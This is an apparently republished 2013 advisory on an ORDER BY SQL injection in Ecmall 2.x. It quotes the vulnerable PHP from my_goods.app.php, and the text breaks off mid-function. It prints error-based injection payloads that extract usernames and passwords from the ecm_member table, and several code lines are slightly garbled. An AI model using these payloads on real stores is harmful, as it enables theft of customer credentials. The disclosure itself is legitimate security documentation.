Ecmall 2.x: SQL injection vulnerability affecting all 2.x versions - vulnerability warning - the black bar safety net

2013-12-25T00:00:00
ID MYHACK58:62201341565
Type myhack58
Reporter 佚名
Modified 2013-12-25T00:00:00

Description

Brief description:

Originally I wanted to finish the analysis and then go after ECSHOP, but I have not had the chance to; more and more I suspect this is not the official version, or that I downloaded the wrong one. I have had a bit to drink and my head is a little dizzy, so I do not know whether this analysis is wrong...

Detailed description:

The injection is in the ORDER BY parameter. A UNION cannot be appended directly after it, but a subquery (double query) can be used.

select...from...order by 1 and (select user_name from ecm_member where user_id=1)

Or

select...from...order by 1,(select user_name from ecm_member where user_id=1)

But inside the second SELECT, a UNION can be used.

select...from...order by 1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(),concat(floor(rand(0)2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema. tables group by a)b)

Or

select...from...order by 1,(select user_name from ecm_member where user_id=1 union select 1 from (select count(),concat(floor(rand(0)2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema. tables group by a)b)

app/my_goods.app.php

/**
 * Store-side goods listing action (app/my_goods.app.php).
 *
 * Builds the category options, filter conditions and paging state via helpers,
 * then fetches the goods list twice: once with the page limit and once without.
 * The sink of the ORDER BY injection described above is the helper _get_goods():
 * it lowercases $_GET['sort'] without checking it against a whitelist, while
 * $_GET['order'] is restricted to 'asc'/'desc'. Mitigation: validate $sort against
 * the fixed set of sortable column names before it is used to build the ORDER BY clause.
 */
function index()

{

/* Obtain the store merchandise categories */

$this->assign('sgcategories', $this->_get_sgcategory_options());

$conditions = $this->_get_conditions();

$page = $this->_get_page();

$page_nolimit = array();

$goods_list = $this->_get_goods($conditions, $page); // follow this call: _get_goods() reads $_GET['sort'] and $_GET['order'] (see below)

$all_goods = $this->_get_goods($conditions, $page_nolimit);

......

}

function _get_goods($conditions, &$page)

{

if (intval($_GET['sgcate_id']) > 0)

{

$cate_mod =& bm('gcategory', array('_store_id' => $this->_store_id));

$cate_ids = $cate_mod->get_descendant_ids(intval($_GET['sgcate_id']));

}

else

{

$cate_ids = 0;

}

// Code has no filter conditions

if ($conditions!= '1 = 1' || ! empty($_GET['sgcate_id']))

{

$this->assign('filtered', 1);

}

//Update the sort

if (isset($_GET['sort']) && isset($_GET['order']))

{

$sort = via strtolower(trim($_GET['sort'])); //not filtered

$order = via strtolower(trim($_GET['order']));

if (! in_array($order,array('asc','desc'))) //only limit order,no limit to the sort

{

$sort = 'goods_id';

$order = 'desc';

}

}

else

{

$sort = 'goods_id';

$order = 'desc';

}

if ($page)

{

$limit = $page['limit'];
